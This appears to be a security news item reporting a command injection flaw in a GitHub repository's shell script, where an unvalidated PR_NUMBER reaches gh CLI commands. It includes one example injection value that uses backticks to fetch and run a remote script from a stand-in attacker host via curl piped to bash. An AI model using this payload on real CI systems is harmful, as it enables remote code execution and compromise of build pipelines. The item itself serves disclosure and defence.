## GitHub Repository Exposes High-Risk Command Injection in PR_NUMBER Script
A critical command injection vulnerability has been exposed in a GitHub repository's automation script, allowing potential remote code execution. The flaw resides in `scripts/post_review_checklist.sh`, where the `PR_NUMBER` parameter is used directly in shell commands without validation. An attacker who can control this input—either via an environment variable or when the script is invoked programmatically—can inject arbitrary commands using backticks or `$()` substitution, leading to full command execution on the host system.

The vulnerability is rated as high-risk due to its remote execution potential. The script passes the unvalidated `PR_NUMBER` variable directly into `gh` CLI commands on lines 63 and 80. For instance, an attacker could set `PR_NUMBER` to a value like `'123\`curl -s attacker.com/evil.sh | bash\```. When the script runs, the injected command would execute, potentially compromising the build environment, CI/CD pipeline, or the underlying server.

This flaw represents a significant supply chain risk for any project or organization using this script in automated workflows, such as pull request reviews or CI checks. It underscores the persistent danger of improper input sanitization in DevOps tooling and highlights how a single unvalidated parameter can become a vector for system takeover. The issue prompts immediate scrutiny of similar patterns across codebases that handle external inputs in shell scripts.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: security, vulnerability, command injection, devops, supply chain
- **Credibility**: unverified
- **Published**: 2026-03-25 08:27:20
- **ID**: 32767
- **URL**: https://whisperx.ai/en/intel/32767